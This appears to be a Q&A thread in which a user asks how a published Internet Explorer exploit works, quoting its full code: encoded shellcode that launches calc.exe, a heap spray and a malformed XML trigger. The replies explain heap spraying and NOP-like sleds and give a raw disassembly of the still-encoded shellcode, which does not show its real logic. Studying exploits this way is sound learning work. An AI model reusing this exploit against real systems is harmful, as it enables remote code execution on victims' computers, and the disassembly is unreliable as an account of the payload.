I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm.
Here is the code:
<html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
Here is what I believe it does and I would like you to help me for the part that I misunderstand.
The variable shellcode
contains the code to open the calc.exe
. I do not get how they have found that weird string. Any idea?
The second thing is the variable spray
. I do not understand this weird loop.
The third thing is the variable memory
that is never used anywhere. Why do they create it?
Last thing: what does the XML tag do in the page?
For the moment I have good answers but mostly very general ones. I would like more explanations of the value of the code. An example is unescape("%u0a0a%u0a0a");
. What does it mean? Same thing for the loop: why did the developer write: length < 0xd0000
? I would like a deeper understanding, not only the theory of this code.
The shellcode contains some x86 assembly instructions that will do the actual exploit. spray
creates a long sequence of instructions that will be put in memory
. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop
instructions before it and jump to somewhere there. The memory
array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.
To understand more deeply, you should actually figure out what is in the x86 code. unscape
will be used to put the sequence of bytes represented of the string in the spray
variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.
In x86 assembly, 0a0a
represents or cl, [edx]
. This is effectively equivalent to nop
instruction for the purposes of our exploit. Wherever we jump to in the spray
, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.
If you look at the XML, you'll see 0x0a0a
is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml
to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx]
instructions until in reaches the beginning of shellcode that's put in memory.
I've disassembled the shellcode:
00000000 C9 leave
00000001 2B1F sub ebx,[edi]
00000003 B10C mov cl,0xc
00000005 BDC536DB9B mov ebp,0x9bdb36c5
0000000A D9C5 fld st5
0000000C 2474 and al,0x74
0000000E 5A pop edx
0000000F F4 hlt
00000010 EA8331FC0B6A6A jmp 0x6a6a:0xbfc3183
00000017 03D4 add edx,esp
00000019 07 pop es
0000001A 67305CFF xor [si-0x1],bl
0000001E 98 cwde
0000001F BBD7FFA4FE mov ebx,0xfea4ffd7
00000024 9B wait
00000025 74AD jz 0xffffffd4
00000027 058B8B028D add eax,0x8d028b8b
0000002C D893BCCD35A2 fcom dword [ebx+0xa235cdbc]
00000032 37 aaa
00000033 B84290A63A mov eax,0x3aa69042
00000038 94 xchg eax,esp
00000039 E99AA4D58D jmp 0x8dd5a4d8
0000003E E5A3 in eax,0xa3
00000040 1F pop ds
00000041 4C dec esp
00000042 EB46 jmp short 0x8a
00000044 4B dec ebx
00000045 8CD0 mov eax,ss
00000047 AD lodsd
00000048 A844 test al,0x44
0000004A 52 push edx
0000004B 4A dec edx
0000004C 3B81B80DD748 cmp eax,[ecx+0x48d70db8]
00000052 4B dec ebx
00000053 D46C aam 0x6c
00000055 46 inc esi
00000056 1392734A204F adc edx,[edx+0x4f204a73]
0000005C F8 clc
0000005D 6E outsb
0000005E DC8EA20726B4 fmul qword [esi+0xb42607a2]
00000064 04D4 add al,0xd4
00000066 D084ECBA978221 rol byte [esp+ebp*8+0x218297ba],1
0000006D 7CE8 jl 0x57
0000006F C0CA8C ror dl,0x8c
00000072 F4 hlt
00000073 A6 cmpsb
00000074 47 inc edi
00000075 210D2EA0B0CD and [0xcdb0a02e],ecx
0000007B 2CA8 sub al,0xa8
0000007D B05B mov al,0x5b
0000007F 43 inc ebx
00000080 F4 hlt
00000081 24E8 and al,0xe8
00000083 7A9C jpe 0x21
00000085 BB857DCBA0 mov ebx,0xa0cb7d85
0000008A 7DED jnl 0x79
0000008C 92 xchg eax,edx
0000008D 09E1 or ecx,esp
0000008F 96 xchg eax,esi
00000090 315580 xor [ebp-0x80],edx
Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe
.